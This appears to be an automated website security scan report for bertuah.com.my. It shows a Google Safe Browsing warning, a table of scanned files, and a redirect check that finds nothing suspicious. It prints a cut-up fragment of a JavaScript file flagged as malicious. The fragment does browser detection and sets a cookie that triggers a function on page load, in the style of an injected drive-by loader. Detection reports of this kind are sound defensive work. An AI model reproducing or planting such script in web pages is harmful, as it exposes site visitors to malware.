Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bertuah.com.my
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bertuah.com.my/ | 200 OK Content-Length: 595 Content-Type: text/html | clean |
http://siu.edu.bd/includes/framework.js | 200 OK Content-Length: 3484 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function browserDetectNav(chrAfterPoint)
{
  var UA=window.navigator.userAgent,
  OperaB = /Opera[ \/]+\w+\.\w+/i,
  OperaV = /Version[ \/]+\w+\.\w+/i,
  FirefoxB = /Firefox\/\w+\.\w+/i,
  ChromeB = /Chrome\/\w+\.\w+/i,
  SafariB = /Version\/\w+\.\w+/i,
  IEB = /MSIE *\d+\.\w+/i,
  SafariV = /Safari\/\w+\.\w+/i,
  browser = new Array(),
  browserSplit = /[ \/\.]/i,
  return unescape( document.cookie.substring( len, end ) ); }
if (navigator.cookieEnabled) { if(GetCookie('HRMSESSION')==777){}else{SetCookie('HRMSESSION', '777', '3', '/'); if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } } }
Antivirus reports:
http://bertuah.com.my/test404page.js | 404 Not Found Content-Length: 484 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bertuah.com.my
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 16 Nov 2013 23:21:41 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 595
Content-Type: text/html
X-Powered-By: PHP/5.3.27
...595 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bertuah.com.my
Referer: http://www.google.com/search?q=bertuah.com.my
Result:
The result is similar to the first query. There are no suspicious redirects found.